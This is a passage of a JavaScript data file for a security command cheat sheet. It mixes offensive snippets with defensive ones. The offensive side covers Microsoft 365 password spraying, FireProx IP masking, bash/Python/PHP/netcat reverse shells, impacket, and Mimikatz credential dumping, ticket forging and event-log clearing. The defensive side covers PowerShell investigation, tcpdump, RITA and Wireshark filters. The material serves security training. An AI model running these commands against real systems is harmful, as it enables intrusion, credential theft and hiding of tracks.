    emoji: '\u{2601}\u{FE0F}',
    title: 'Cloud — MSOLSpray (M365 Password Spray)',
    commands: [
      { title: 'MSOLSpray — Clone repo', desc: 'Download MSOLSpray from GitHub', diff: 'easy', code: 'git clone https://github.com/joswr1ght/MSOLSpray.git' },
      { title: 'MSOLSpray — Install deps', desc: 'Install Python requirements', diff: 'easy', code: 'pip3 install -r requirements.txt' },
      { title: 'MSOLSpray — Basic spray', desc: 'Password spray users with one password', diff: 'hard', code: 'python3 MSOLSpray.py -u <user_file> -p <password>' },
      { title: 'MSOLSpray — Single user', desc: 'Test creds for one account', diff: 'hard', code: 'python3 MSOLSpray.py -t <email> -p <password>' },
      { title: 'MSOLSpray — User enum', desc: 'Enumerate valid M365 usernames', diff: 'hard', code: 'python3 MSOLSpray.py -u <user_file> --enum' },
      { title: 'MSOLSpray — Custom domain', desc: 'Target specific domain', diff: 'hard', code: 'python3 MSOLSpray.py -u <user_file> -p <password> -d <domain>' },
      { title: 'MSOLSpray — Delay', desc: 'Wait between attempts to avoid lockout', diff: 'hard', code: 'python3 MSOLSpray.py -u <user_file> -p <password> --delay <seconds>' },
      { title: 'MSOLSpray — Safe mode', desc: 'Stop if account lockouts detected', diff: 'hard', code: 'python3 MSOLSpray.py -u <user_file> -p <password> --safe' },
      { title: 'MSOLSpray — Verbose', desc: 'Detailed auth responses', diff: 'medium', code: 'python3 MSOLSpray.py -u <user_file> -p <password> -v' },
      { title: 'MSOLSpray — Save output', desc: 'Write results to file', diff: 'medium', code: 'python3 MSOLSpray.py -u <user_file> -p <password> -o <output>' },
      { title: 'MSOLSpray — Shuffle users', desc: 'Randomize user order during spray', diff: 'medium', code: 'python3 MSOLSpray.py -u <user_file> -p <password> --shuffle' },
      { title: 'MSOLSpray — Proxy', desc: 'Route through Burp/socks proxy', diff: 'hard', code: 'python3 MSOLSpray.py -u <user_file> -p <password> --proxy http://<ip>:<port>' },
      { title: 'MSOLSpray — Custom UA', desc: 'Set custom User-Agent header', diff: 'medium', code: 'python3 MSOLSpray.py -u <user_file> -p <password> --useragent "<ua>"' },
    ]
  },
  {
    id: 'fireprox',
    emoji: '\u{1F525}',
    title: 'Cloud — FireProx (AWS API Gateway Proxy)',
    commands: [
      { title: 'fireprox — Create proxy', desc: 'Create API Gateway for target URL', diff: 'hard', code: 'python3 fire.py --url <target_url>' },
      { title: 'fireprox — List proxies', desc: 'List all existing FireProx APIs', diff: 'medium', code: 'python3 fire.py --list' },
      { title: 'fireprox — Delete proxy', desc: 'Delete specific proxy by ID', diff: 'hard', code: 'python3 fire.py --delete <api_id>' },
      { title: 'fireprox — Destroy all', desc: 'Remove all FireProx-created APIs', diff: 'hard', code: 'python3 fire.py --destroy' },
      { title: 'fireprox — Update URL', desc: 'Change backend target URL', diff: 'hard', code: 'python3 fire.py --update <api_id> --url <new_url>' },
      { title: 'fireprox — Specific region', desc: 'Deploy proxy in selected AWS region', diff: 'hard', code: 'python3 fire.py --region <region> --url <target_url>' },
      { title: 'fireprox — Specific method', desc: 'Enable GET/POST etc', diff: 'medium', code: 'python3 fire.py --url <target_url> --method <method>' },
      { title: 'fireprox — Multiple methods', desc: 'Enable several HTTP methods', diff: 'medium', code: 'python3 fire.py --url <target_url> --method GET POST PUT' },
      { title: 'fireprox — Curl through proxy', desc: 'Send request via FireProx endpoint', diff: 'easy', code: 'curl https://<api_id>.execute-api.<region>.amazonaws.com/fireprox/' },
      { title: 'fireprox — Curl POST', desc: 'POST request through proxy', diff: 'medium', code: 'curl -X POST -d "<data>" https://<api_id>.execute-api.<region>.amazonaws.com/fireprox/<path>' },
      { title: 'fireprox — M365 spray', desc: 'Mask IP during password spray', diff: 'hard', code: 'python3 fire.py --url https://login.microsoftonline.com' },
    ]
  },
  {
    id: 'shells',
    emoji: '\u{1F41A}',
    title: 'Reverse Shells & Listeners',
    commands: [
      { title: 'netcat — Listener', desc: 'Listen for incoming connection', diff: 'easy', code: 'nc -l -p <port>' },
      { title: 'netcat — Client', desc: 'Connect to listening server', diff: 'easy', code: 'nc <target> <port>' },
      { title: 'netcat — Chat server', desc: 'Two-way chat between hosts', diff: 'easy', code: [
        '# Server:',
        'nc -l -p <port>',
        '# Client:',
        'nc <server_ip> <port>',
      ]},
      { title: 'netcat — Pull file (receiver)', desc: 'Download file from sender', diff: 'medium', code: 'nc -l -p <port> > <file>' },
      { title: 'netcat — Pull file (sender)', desc: 'Send file to waiting receiver', diff: 'medium', code: 'nc <target> <port> < <file>' },
      { title: 'netcat — Push file (sender)', desc: 'Push file to waiting listener', diff: 'medium', code: 'cat <file> | nc <target> <port>' },
      { title: 'netcat — Push file (receiver)', desc: 'Receive pushed file', diff: 'medium', code: 'nc -l -p <port> > <file>' },
      { title: 'netcat — Linux backdoor', desc: 'Bind shell via -e flag', diff: 'hard', code: 'nc -l -p <port> -e /bin/sh' },
      { title: 'netcat — Windows reverse shell', desc: 'Reverse shell via -e flag', diff: 'hard', code: 'nc <target> <port> -e cmd.exe' },
      { title: 'netcat — Port check', desc: 'Test if port is open', diff: 'easy', code: 'nc -vvv -z -w3 <target> <port>' },
      { title: 'netcat — Named pipe relay', desc: 'Forward traffic through pivot', diff: 'hard', code: [
        '# On pivot:',
        'mkfifo <pipe>',
        'nc -l -p <local_port> < <pipe> | nc <target> <remote_port> > <pipe>',
        '# Then connect to pivot from attacker:',
        'nc <pivot_ip> <local_port>',
      ]},
      { title: 'Bash reverse shell', desc: 'One-liner for Linux targets', diff: null, code: 'bash -c \'bash -i >& /dev/tcp/<ip>/<port> 0>&1\'' },
      { title: 'Python reverse shell', desc: 'Python3 one-liner', diff: null, code: 'python3 -c \'import socket,subprocess,os;s=socket.socket();s.connect(("<ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'' },
      { title: 'PHP reverse shell', desc: 'Web shell via PHP', diff: null, code: 'php -r \'$s=fsockopen("<ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");\'' },
      { title: 'Python HTTP server', desc: 'Quick file transfer server', diff: null, code: 'python3 -m http.server <port>' },
      { title: 'socat — Full TTY', desc: 'Fully interactive TTY shell', diff: 'hard', code: [
        '# listener:',
        'socat file:`tty`,raw,echo=0 TCP-LISTEN:<port>',
        '# target:',
        'socat exec:\'bash -li\',pty,stderr,setsid,sigint,sane TCP:<ip>:<port>',
      ]},
      { title: 'Upgrade shell — Python', desc: 'PTY upgrade after netcat', diff: null, code: [
        'python3 -c \'import pty;pty.spawn("/bin/bash")\'',
        'Ctrl+Z',
        'stty raw -echo; fg',
        'reset; export TERM=xterm',
      ]},
    ]
  },
  {
    id: 'lateral',
    emoji: '\u{1F504}',
    title: 'Lateral Movement',
    commands: [
      { title: 'impacket — psexec', desc: 'Execute as admin on Windows', diff: null, code: 'impacket-psexec <domain>/<user>:<pass>@<target>' },
      { title: 'impacket — wmiexec', desc: 'WMI execution (subtle)', diff: null, code: 'impacket-wmiexec <domain>/<user>:<pass>@<target>' },
      { title: 'impacket — secretsdump', desc: 'Dump hashes from DC', diff: null, code: 'impacket-secretsdump <domain>/<user>:<pass>@<target>' },
      { title: 'evil-winrm', desc: 'WinRM shell session', diff: null, code: 'evil-winrm -i <target> -u <user> -p <pass>' },
      { title: 'smbclient', desc: 'List SMB shares anonymously', diff: null, code: 'smbclient -L //<target> -N' },
      { title: 'ssh — Tunnel', desc: 'Local port forward through SSH', diff: null, code: 'ssh -L <local_port>:<remote_host>:<remote_port> <user>@<jump_host>' },
    ]
  },
  {
    id: 'mimikatz',
    emoji: '\u{1F9EC}',
    title: 'Post-Exploitation — Mimikatz',
    commands: [
      { title: 'mimikatz — Version', desc: 'Show tool version', diff: 'easy', code: 'version' },
      { title: 'mimikatz — Debug privilege', desc: 'Enable SeDebugPrivilege', diff: 'medium', code: 'privilege::debug' },
      { title: 'mimikatz — Logon passwords', desc: 'Dump plaintext creds from LSASS', diff: 'hard', code: 'sekurlsa::logonpasswords' },
      { title: 'mimikatz — Minidump LSASS', desc: 'Load LSASS dump file for offline parsing', diff: 'hard', code: 'sekurlsa::minidump <dump_file>' },
      { title: 'mimikatz — List Kerberos tickets', desc: 'Show cached Kerberos tickets', diff: 'hard', code: 'sekurlsa::tickets' },
      { title: 'mimikatz — Export tickets', desc: 'Export Kerberos tickets to files', diff: 'hard', code: 'sekurlsa::tickets /export' },
      { title: 'mimikatz — Extract Kerberos keys', desc: 'Dump Kerberos encryption keys', diff: 'hard', code: 'sekurlsa::ekeys' },
      { title: 'mimikatz — Pass-the-hash', desc: 'Authenticate with NTLM hash', diff: 'hard', code: 'sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe' },
      { title: 'mimikatz — Inject ticket', desc: 'Pass-the-ticket with .kirbi file', diff: 'hard', code: 'kerberos::ptt <ticket_file>' },
      { title: 'mimikatz — Golden ticket', desc: 'Forge Kerberos TGT with KRBTGT hash', diff: 'hard', code: 'kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<hash> /ptt' },
      { title: 'mimikatz — Silver ticket', desc: 'Forge service-specific ticket', diff: 'hard', code: 'kerberos::golden /target:<target> /service:<service> /rc4:<hash> /user:<user> /ptt' },
      { title: 'mimikatz — DCSync user', desc: 'Extract AD user creds via replication', diff: 'hard', code: 'lsadump::dcsync /user:<domain>\\<user>' },
      { title: 'mimikatz — DCSync all', desc: 'Dump all domain credentials', diff: 'hard', code: 'lsadump::dcsync /domain:<domain> /all /csv' },
      { title: 'mimikatz — SAM dump', desc: 'Dump local SAM account hashes', diff: 'hard', code: 'lsadump::sam' },
      { title: 'mimikatz — LSA secrets', desc: 'Extract LSA secrets from registry', diff: 'hard', code: 'lsadump::secrets' },
      { title: 'mimikatz — Skeleton key', desc: 'Inject skeleton key backdoor into AD', diff: 'hard', code: 'misc::skeleton' },
      { title: 'mimikatz — Vault list', desc: 'Show Windows Credential Manager data', diff: 'hard', code: 'vault::list' },
      { title: 'mimikatz — DPAPI decrypt', desc: 'Decrypt DPAPI-protected data', diff: 'hard', code: 'dpapi::cred /in:<file>' },
      { title: 'mimikatz — Elevate token', desc: 'Elevate via token manipulation', diff: 'hard', code: 'token::elevate' },
      { title: 'mimikatz — List tokens', desc: 'Show available tokens', diff: 'medium', code: 'token::list' },
      { title: 'mimikatz — Process inject', desc: 'Inject into remote process', diff: 'hard', code: 'process::inject /pid:<pid>' },
      { title: 'mimikatz — Clear event logs', desc: 'Clear Windows event logs', diff: 'hard', code: 'event::clear' },
      { title: 'mimikatz — Log to file', desc: 'Save command output to file', diff: 'medium', code: 'log <output_file>' },
      { title: 'mimikatz — Help', desc: 'Show available commands', diff: 'easy', code: 'help' },
      { title: 'mimikatz — Exit', desc: 'Close mimikatz', diff: 'easy', code: 'exit' },
      { title: 'procdump — Dump LSASS', desc: 'Create LSASS dump for offline analysis', diff: 'hard', code: 'procdump.exe -accepteula -ma lsass.exe <dump_file>' },
    ]
  },
  {
    id: 'win-investigate',
    emoji: '\u{1F50D}',
    title: 'Windows — Live Investigation (PowerShell)',
    commands: [
      { title: 'Get-Process list all', desc: 'Show all running processes', diff: 'easy', code: 'Get-Process' },
      { title: 'Get-Process specific', desc: 'Show info for specific process', diff: 'easy', code: 'Get-Process <process_name>' },
      { title: 'Get-Process details', desc: 'Show all properties for process', diff: 'medium', code: 'Get-Process lsass | Select-Object -Property *' },
      { title: 'Get-Process path+name', desc: 'Show executable path and PID', diff: 'medium', code: 'Get-Process | Select-Object -Property Path, Name, Id' },
      { title: 'Get-Process filter name', desc: 'Filter by process name', diff: 'medium', code: 'Get-Process | Select-Object Path, Name, Id | Where-Object Name -eq <process_name>' },
      { title: 'Get-Process filter temp', desc: 'Find processes running from temp', diff: 'hard', code: 'Get-Process | Select-Object Path, Name, Id | Where-Object Path -Like "*temp*"' },
      { title: 'Get-NetTCPConnection', desc: 'Show active TCP connections', diff: 'medium', code: 'Get-NetTCPConnection' },
      { title: 'Get-NetTCPConnection details', desc: 'Show connections with local details', diff: 'medium', code: 'Get-NetTCPConnection | Select-Object LocalAddress, LocalPort, State, OwningProcess' },
      { title: 'Find process by PID', desc: 'Look up process owning a connection', diff: 'medium', code: 'Get-Process | Select-Object Path, Name, Id | Where-Object Id -eq <pid>' },
      { title: 'Kill process by PID', desc: 'Terminate suspicious process', diff: 'medium', code: 'Stop-Process -Id <pid>' },
      { title: 'Registry — List HKLM Run', desc: 'Check startup programs (machine)', diff: 'hard', code: 'Get-ItemProperty "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"' },
      { title: 'Registry — List HKLM RunOnce', desc: 'Check one-time startup (machine)', diff: 'hard', code: 'Get-ItemProperty "HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"' },
      { title: 'Registry — List HKCU Run', desc: 'Check startup programs (user)', diff: 'hard', code: 'Get-ItemProperty "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"' },
      { title: 'Registry — List HKCU RunOnce', desc: 'Check one-time startup (user)', diff: 'hard', code: 'Get-ItemProperty "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"' },
      { title: 'Registry — Remove startup entry', desc: 'Delete malicious startup key', diff: 'hard', code: 'Remove-ItemProperty -Path "<reg_path>" -Name "<value>"' },
      { title: 'Registry — Read specific entry', desc: 'Read single startup value', diff: 'hard', code: 'Get-ItemProperty "<reg_path>" -Name "<value>"' },
      { title: 'Delete file from temp', desc: 'Remove malicious file from Temp', diff: 'medium', code: 'Remove-Item $env:temp\\<file>' },
      { title: 'Baseline — Export services', desc: 'Snapshot current services for later comparison', diff: 'hard', code: 'Get-Service | Select-Object -ExpandProperty Name | Out-File "<output>"' },
      { title: 'Baseline — Export scheduled tasks', desc: 'Snapshot scheduled tasks for comparison', diff: 'hard', code: 'Get-ScheduledTask | Select-Object -ExpandProperty TaskName | Out-File "<output>"' },
      { title: 'Baseline — Export local users', desc: 'Snapshot local users for comparison', diff: 'hard', code: 'Get-LocalUser | Select-Object -ExpandProperty Name | Out-File "<output>"' },
      { title: 'Diff — Compare services', desc: 'Compare current services against baseline', diff: 'hard', code: 'Compare-Object (Get-Content "<baseline>") (Get-Content "<current>")' },
      { title: 'Diff — Compare scheduled tasks', desc: 'Compare current tasks against baseline', diff: 'hard', code: 'Compare-Object (Get-Content "<baseline>") (Get-Content "<current>")' },
      { title: 'Diff — Compare local users', desc: 'Compare current users against baseline', diff: 'hard', code: 'Compare-Object (Get-Content "<baseline>") (Get-Content "<current>")' },
      { title: 'Export-ScheduledTask', desc: 'Dump scheduled task XML definition', diff: 'hard', code: 'Export-ScheduledTask -TaskName "<task_name>"' },
      { title: 'Stop-Service', desc: 'Stop suspicious service', diff: 'medium', code: 'Stop-Service -Name <service_name>' },
      { title: 'Remove-Item', desc: 'Delete malicious file', diff: 'medium', code: 'Remove-Item <path>' },
      { title: 'sc.exe delete', desc: 'Delete service via sc', diff: 'medium', code: 'sc.exe delete <service_name>' },
      { title: 'Unregister-ScheduledTask', desc: 'Remove scheduled task', diff: 'hard', code: 'Unregister-ScheduledTask -TaskName "<task_name>"' },
      { title: 'Remove-LocalUser', desc: 'Delete malicious local user', diff: 'hard', code: 'Remove-LocalUser -Name <user>' },
    ]
  },
  {
    id: 'osint',
    emoji: '\u{1F575}',
    title: 'OSINT',
    commands: [
      { title: 'theHarvester', desc: 'Email, domain, subdomain enumeration', diff: 'easy', code: 'theHarvester -d <domain> -b google,bing,linkedin' },
      { title: 'sherlock', desc: 'Find username across social networks', diff: 'easy', code: 'sherlock <username>' },
      { title: 'shodan', desc: 'Search for internet-connected devices', diff: 'medium', code: 'shodan search "port:22 country:US"' },
      { title: 'google dorks', desc: 'Google search operators for info gathering', diff: 'easy', code: [
        'site:target.com filetype:pdf',
        'intitle:"index of" password',
        'inurl:admin intitle:"login"',
      ]},
      { title: 'waybackurls', desc: 'Get historical URLs from Wayback Machine', diff: 'easy', code: 'waybackurls <domain>' },
      { title: 'holehe', desc: 'Check if email is used on services', diff: 'easy', code: 'holehe <email>' },
    ]
  },
  {
    id: 'flow-logs',
    emoji: '\u{1F4E1}',
    title: 'Network — VPC Flow Log Analysis',
    commands: [
      { title: 'zcat — View gzip log', desc: 'Read compressed flow log', diff: 'medium', code: 'zcat <file>.gz | head -<lines>' },
      { title: 'zcat — Count all records', desc: 'Line count across all gzipped files', diff: 'medium', code: 'zcat <directory>/*.gz | wc -l' },
      { title: 'zgrep — Search compressed', desc: 'Find IP across all gzipped logs', diff: 'medium', code: 'zgrep --no-filename <ip> <directory>/*.gz > <output>' },
      { title: 'zgrep — Exclude port', desc: 'Filter out specific port from results', diff: 'hard', code: 'zgrep <ip> <directory>/*.gz | grep -v :<port>' },
      { title: 'sort — By timestamp', desc: 'Sort flows by start time (col 15)', diff: 'hard', code: 'sort -nk <column> <file> | head -<lines>' },
      { title: 'sort — By bytes', desc: 'Find largest flows by bytes (col 12)', diff: 'hard', code: 'sort -nk <column> <file> | tail -<lines>' },
      { title: 'date — Convert epoch', desc: 'Convert Unix timestamp to human date', diff: 'easy', code: 'date -d @<timestamp>' },
      { title: 'awk — Sum bytes by port', desc: 'Total bytes for specific port', diff: 'hard', code: 'awk \'$<col> == "<value>"\' {SUM=SUM+$<byte_col>} END{print "Total: " SUM}' },
      { title: 'awk — Filter by field', desc: 'Extract lines where field matches', diff: 'hard', code: 'cat <file> | awk \'$<field> == "<value>"\'' },
      { title: 'nfdump — Export netflow', desc: 'Convert PCAP to netflow format', diff: 'hard', code: 'nfpcapd -r <pcap> -w <output_dir>' },
      { title: 'nfdump — Process export', desc: 'Read exported netflow data', diff: 'hard', code: 'nfdump -R <exported_dir> > <output>' },
      { title: 'nfdump — Flow from IP', desc: 'Search netflow for specific address', diff: 'hard', code: 'cat <netflow_file> | grep <ip>' },
      { title: 'nfdump — Exclude multiple ports', desc: 'Chain port exclusions', diff: 'hard', code: 'cat <file> | grep <ip> | grep -v :<port1> | grep -v :<port2>' },
      { title: 'file — Identify format', desc: 'Check file type of flow log', diff: 'easy', code: 'file <file>' },
      { title: 'wc — Line count', desc: 'Count records in flow log', diff: 'easy', code: 'wc -l <file>' },
      { title: 'ls — List directory', desc: 'List flow log files', diff: 'easy', code: 'ls <directory>' },
    ]
  },
  {
    id: 'zeek-rita',
    emoji: '\u{1F50E}',
    title: 'Network — Zeek & RITA',
    commands: [
      { title: 'zeek — Generate logs from PCAP', desc: 'Create Zeek logs from packet capture', diff: 'hard', code: 'zeek -r <pcap>' },
      { title: 'rita — Import Zeek logs', desc: 'Import logs into RITA database', diff: 'hard', code: 'rita import <zeek_log_dir> <database_name>' },
      { title: 'rita — List databases', desc: 'Show all imported databases', diff: 'easy', code: 'rita list' },
      { title: 'rita — Delete database', desc: 'Remove an imported database', diff: 'medium', code: 'rita delete <database_name>' },
      { title: 'rita — Clean broken DBs', desc: 'Find and remove broken databases', diff: 'medium', code: 'rita clean' },
      { title: 'rita — Show beacons', desc: 'Detect C2 beaconing behavior', diff: 'hard', code: 'rita show-beacons <database_name> -H' },
      { title: 'rita — Show beacons (SNI)', desc: 'C2 detection via SNI analysis', diff: 'hard', code: 'rita show-beacons-sni <database_name> -H' },
      { title: 'rita — Show beacons (proxy)', desc: 'C2 detection via proxy logs', diff: 'hard', code: 'rita show-beacons-proxy <database_name> -H' },
      { title: 'rita — Show DNS tunnels', desc: 'Detect DNS covert channels', diff: 'hard', code: 'rita show-exploded-dns <database_name> -H' },
      { title: 'rita — Show long connections', desc: 'Find unusually long connections', diff: 'hard', code: 'rita show-long-connections <database_name> -H' },
      { title: 'rita — Show open connections', desc: 'Show connections still open', diff: 'medium', code: 'rita show-open-connections <database_name> -H' },
      { title: 'rita — Show strobes', desc: 'Detect port scan strobes', diff: 'hard', code: 'rita show-strobes <database_name> -H' },
      { title: 'rita — Show blacklisted hosts', desc: 'Print blacklisted hostnames', diff: 'medium', code: 'rita show-bl-hostnames <database_name> -H' },
      { title: 'rita — Show blacklisted src IPs', desc: 'Blacklisted IPs that initiated connections', diff: 'medium', code: 'rita show-bl-source-ips <database_name> -H' },
      { title: 'rita — Show blacklisted dst IPs', desc: 'Blacklisted IPs that received connections', diff: 'medium', code: 'rita show-bl-dest-ips <database_name> -H' },
      { title: 'rita — Show user agents', desc: 'Print user-agent strings', diff: 'medium', code: 'rita show-useragents <database_name> -H' },
      { title: 'rita — HTML report', desc: 'Generate full HTML analysis report', diff: 'hard', code: 'rita html-report <database_name>' },
      { title: 'rita — Test config', desc: 'Validate RITA configuration file', diff: 'medium', code: 'rita test-config' },
    ]
  },
  {
    id: 'tcpdump',
    emoji: '\u{1F4E1}',
    title: 'Network — tcpdump',
    commands: [
      { title: 'tcpdump — List interfaces', desc: 'Show available capture interfaces', diff: 'easy', code: 'tcpdump -D' },
      { title: 'tcpdump — Capture on interface', desc: 'Capture packets on specific NIC', diff: 'easy', code: 'tcpdump -i <interface>' },
      { title: 'tcpdump — Write to file', desc: 'Save captured packets to PCAP', diff: 'easy', code: 'tcpdump -w <output>' },
      { title: 'tcpdump — Read from file', desc: 'Read packets from saved PCAP', diff: 'easy', code: 'tcpdump -r <pcap>' },
      { title: 'tcpdump — Count packets', desc: 'Stop after N packets', diff: 'easy', code: 'tcpdump -c <count> -i <interface>' },
      { title: 'tcpdump — No resolution', desc: 'Don\'t resolve hostnames/ports', diff: 'easy', code: 'tcpdump -n -r <pcap>' },
      { title: 'tcpdump — Full no resolution', desc: 'Don\'t resolve IPs or ports', diff: 'easy', code: 'tcpdump -nn -r <pcap>' },
      { title: 'tcpdump — Verbose', desc: 'Detailed output (add -vv -vvv)', diff: 'medium', code: 'tcpdump -v -r <pcap>' },
      { title: 'tcpdump — Quiet', desc: 'Brief packet info', diff: 'easy', code: 'tcpdump -q -r <pcap>' },
      { title: 'tcpdump — MAC addresses', desc: 'Display link-layer headers', diff: 'medium', code: 'tcpdump -e -r <pcap>' },
      { title: 'tcpdump — ASCII output', desc: 'Print packets as ASCII', diff: 'medium', code: 'tcpdump -A -r <pcap>' },
      { title: 'tcpdump — Hex dump', desc: 'Show packets in hex + ASCII', diff: 'medium', code: 'tcpdump -X -r <pcap>' },
      { title: 'tcpdump — Hex + link-layer', desc: 'Hex dump with MAC headers', diff: 'hard', code: 'tcpdump -xx -r <pcap>' },
      { title: 'tcpdump — Line numbers', desc: 'Display packet numbers', diff: 'easy', code: 'tcpdump -# -r <pcap>' },
      { title: 'tcpdump — Timestamps', desc: 'Print Unix timestamps', diff: 'easy', code: 'tcpdump -tt -r <pcap>' },
      { title: 'tcpdump — Filter by host', desc: 'Capture from/to specific IP', diff: 'easy', code: 'tcpdump host <ip>' },
      { title: 'tcpdump — Source host', desc: 'Capture from source IP', diff: 'easy', code: 'tcpdump src host <ip>' },
      { title: 'tcpdump — Dest host', desc: 'Capture to destination IP', diff: 'easy', code: 'tcpdump dst host <ip>' },
      { title: 'tcpdump — Filter by net', desc: 'Capture traffic to/from subnet', diff: 'medium', code: 'tcpdump net <subnet>' },
      { title: 'tcpdump — Filter by port', desc: 'Capture traffic on port', diff: 'easy', code: 'tcpdump port <port>' },
      { title: 'tcpdump — Source port', desc: 'Filter by source port', diff: 'medium', code: 'tcpdump src port <port>' },
      { title: 'tcpdump — Dest port', desc: 'Filter by destination port', diff: 'medium', code: 'tcpdump dst port <port>' },
      { title: 'tcpdump — Protocol TCP', desc: 'Filter TCP traffic only', diff: 'easy', code: 'tcpdump tcp' },
      { title: 'tcpdump — Protocol UDP', desc: 'Filter UDP traffic only', diff: 'easy', code: 'tcpdump udp' },
      { title: 'tcpdump — Protocol ICMP', desc: 'Filter ICMP traffic only', diff: 'easy', code: 'tcpdump icmp' },
      { title: 'tcpdump — Protocol ARP', desc: 'Filter ARP traffic only', diff: 'medium', code: 'tcpdump arp' },
      { title: 'tcpdump — IPv4 only', desc: 'Filter IPv4 packets', diff: 'easy', code: 'tcpdump ip' },
      { title: 'tcpdump — IPv6 only', desc: 'Filter IPv6 packets', diff: 'easy', code: 'tcpdump ip6' },
      { title: 'tcpdump — Logical AND', desc: 'Combine filters with AND', diff: 'medium', code: 'tcpdump <filter1> and <filter2>' },
      { title: 'tcpdump — Logical OR', desc: 'Combine filters with OR', diff: 'medium', code: 'tcpdump <filter1> or <filter2>' },
      { title: 'tcpdump — Logical NOT', desc: 'Exclude matching packets', diff: 'medium', code: 'tcpdump not <filter>' },
      { title: 'tcpdump — Packet length >', desc: 'Filter packets larger than N bytes', diff: 'medium', code: 'tcpdump greater <bytes>' },
      { title: 'tcpdump — Packet length <', desc: 'Filter packets smaller than N bytes', diff: 'medium', code: 'tcpdump less <bytes>' },
      { title: 'tcpdump — SYN flag', desc: 'Filter TCP SYN packets', diff: 'hard', code: 'tcpdump "tcp[tcpflags] == tcp-syn"' },
      { title: 'tcpdump — ACK flag', desc: 'Filter TCP ACK packets', diff: 'hard', code: 'tcpdump "tcp[tcpflags] == tcp-ack"' },
      { title: 'tcpdump — FIN flag', desc: 'Filter TCP FIN packets', diff: 'hard', code: 'tcpdump "tcp[tcpflags] & tcp-fin != 0"' },
      { title: 'tcpdump — RST flag', desc: 'Filter TCP RST packets', diff: 'hard', code: 'tcpdump "tcp[tcpflags] & tcp-rst != 0"' },
      { title: 'tcpdump — SYN-ACK', desc: 'Filter SYN-ACK (0x12)', diff: 'hard', code: 'tcpdump "tcp[tcpflags] == 0x12"' },
      { title: 'tcpdump — FIN+RST', desc: 'Filter termination flags', diff: 'hard', code: 'tcpdump -r <pcap> -nt \'tcp[13] & 0x05 != 0\'' },
      { title: 'tcpdump — Snapshot length', desc: 'Set bytes captured per packet', diff: 'medium', code: 'tcpdump -s <bytes> -i <interface>' },
      { title: 'tcpdump — ARP request', desc: 'Identify who asked for a MAC', diff: 'hard', code: 'tcpdump -n -r <pcap> \'arp and arp[6:2] == 1\'' },
      { title: 'tcpdump — DNS capture live', desc: 'Capture DNS traffic and save', diff: 'hard', code: 'tcpdump -n -i <interface> -w <output> \'udp port 53\'' },
    ]
  },
  {
    id: 'wireshark',
    emoji: '\u{1F4FA}',
    title: 'Network — Wireshark Display Filters',
    commands: [
      { title: 'wireshark — Filter by IP', desc: 'Match source or destination IP', diff: 'easy', code: 'ip.addr == <ip>' },
      { title: 'wireshark — Source IP', desc: 'Match only source IP', diff: 'easy', code: 'ip.src == <ip>' },
      { title: 'wireshark — Dest IP', desc: 'Match only destination IP', diff: 'easy', code: 'ip.dst == <ip>' },
      { title: 'wireshark — IP range', desc: 'Filter IPs within range', diff: 'medium', code: 'ip.addr >= <start_ip> and ip.addr <= <end_ip>' },
      { title: 'wireshark — Multiple IPs', desc: 'Filter traffic between two IPs', diff: 'medium', code: 'ip.addr == <ip1> and ip.addr == <ip2>' },
      { title: 'wireshark — Exclude IP', desc: 'Show all except specific IP', diff: 'medium', code: '!(ip.addr == <ip>)' },
      { title: 'wireshark — Subnet', desc: 'Filter by CIDR range', diff: 'medium', code: 'ip.addr == <subnet>' },
      { title: 'wireshark — Filter by port', desc: 'Match source or destination port', diff: 'easy', code: 'tcp.port == <port>' },
      { title: 'wireshark — Dest port', desc: 'Match destination port only', diff: 'easy', code: 'tcp.dstport == <port>' },
      { title: 'wireshark — IP + port', desc: 'Combine IP and port filter', diff: 'medium', code: 'ip.addr == <ip> and tcp.port == <port>' },
      { title: 'wireshark — HTTP host', desc: 'Filter by HTTP Host header', diff: 'medium', code: 'http.host == "<host>"' },
      { title: 'wireshark — Timestamp range', desc: 'Filter packets by time', diff: 'hard', code: 'frame.time >= "<date> <time>"' },
      { title: 'wireshark — SYN flag', desc: 'Filter TCP SYN (no ACK)', diff: 'hard', code: 'tcp.flags.syn == 1 and tcp.flags.ack == 0' },
      { title: 'wireshark — RST flag', desc: 'Filter TCP reset packets', diff: 'hard', code: 'tcp.flags.reset == 1' },
      { title: 'wireshark — MAC address', desc: 'Filter by MAC address', diff: 'medium', code: 'eth.addr == <mac>' },
      { title: 'wireshark — Broadcast', desc: 'Filter broadcast frames', diff: 'medium', code: 'eth.dst == ff:ff:ff:ff:ff:ff' },
      { title: 'wireshark — Multicast', desc: 'Filter multicast traffic', diff: 'hard', code: '(eth.dst[0] & 1)' },
      { title: 'wireshark — Wi-Fi beacon', desc: 'Filter 802.11 beacon frames', diff: 'hard', code: 'wlan.fc.type_subtype == 0x08' },
      { title: 'wireshark — Frame contains', desc: 'Search packet payload for text', diff: 'medium', code: 'frame contains "<text>"' },
      { title: 'wireshark — Packet length >', desc: 'Filter packets larger than N bytes', diff: 'medium', code: 'frame.len > <bytes>' },
      { title: 'wireshark — Packet length <', desc: 'Filter packets smaller than N bytes', diff: 'medium', code: 'frame.len < <bytes>' },
      { title: 'wireshark — AND operator', desc: 'Both conditions must match', diff: 'easy', code: '<filter1> and <filter2>' },
      { title: 'wireshark — OR operator', desc: 'Either condition matches', diff: 'easy', code: '<filter1> or <filter2>' },
      { title: 'wireshark — XOR operator', desc: 'Only one condition true', diff: 'hard', code: '<filter1> xor <filter2>' },
      { title: 'wireshark — NOT operator', desc: 'Negate condition', diff: 'medium', code: 'not <filter>' },
      { title: 'wireshark — Protocol hierarchy', desc: 'Traffic breakdown by protocol (GUI: Statistics menu)', diff: 'medium', code: 'Statistics -> Protocol Hierarchy' },
      { title: 'wireshark — Conversations', desc: 'Endpoint conversations by protocol (GUI: Statistics menu)', diff: 'medium', code: 'Statistics -> Conversations' },
      { title: 'wireshark — Endpoints', desc: 'List unique IPs/MACs with packet counts (GUI: Statistics menu)', diff: 'easy', code: 'Statistics -> Endpoints' },
